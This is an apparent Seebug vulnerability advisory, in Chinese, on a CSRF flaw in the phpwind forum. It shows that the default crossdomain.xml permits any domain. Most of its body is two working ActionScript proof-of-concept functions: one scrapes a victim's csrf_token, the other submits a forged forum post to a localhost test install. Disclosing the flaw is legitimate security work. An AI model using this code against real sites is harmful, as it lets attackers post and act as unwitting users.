phpwind配置不当可导致CSRF发帖

2013-09-28T00:00:00
ID SSV:94435
Type seebug
Reporter Root
Modified 2013-09-28T00:00:00

Description

简要描述:

phpwind配置不当可导致CSRF发帖

详细说明:

crossdomain.xml的默认设置:

<?xml version="1.0"?> -<cross-domain-policy> <allow-access-from domain="*"/> <!-- flash跨域策略,domain建议设置为 *.你的站点域名 --> </cross-domain-policy>

虽然有建议 但是普通站长谁没事改这个啊,还不如你们在安装时直接根据host重写下crossdomain.xml得了。 先取到csrf的token

<img src="https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png" alt="Q.png" width="600" onerror="javascript:errimg(this);">

function gethash() { function getformhash(txt) { txt = txt.split('csrf_token" value="')[1].split('"')[0]; return txt; } var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { if (txt) { txt = getformhash(txt); } else { txt = "Error connecting to server."; } trace(txt); }; var send_lv:LoadVars = new LoadVars(); method = 'GET'; url = "http://localhost:8080/index.php?c=post&fid=2"; send_lv.sendAndLoad(url,result_lv,method); } gethash()

然后csrf发帖 pw这里甚至没有对refer进行检查 可以直接外域提交

<img src="https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png" alt="Q57.png" width="600" onerror="javascript:errimg(this);">

function dopost() { var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { trace(txt); }; var send_lv:LoadVars = new LoadVars(); method = 'post'; url = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2"; send_lv['csrf_token'] = '{{ csrf_token }}'; send_lv['atc_title'] = '1380343694'; send_lv['atc_content'] = '12112123123sdf1'; send_lv['pid'] = ''; send_lv['tid'] = ''; send_lv['special'] = 'default'; send_lv.sendAndLoad(url,result_lv,method); } dopost()

漏洞证明: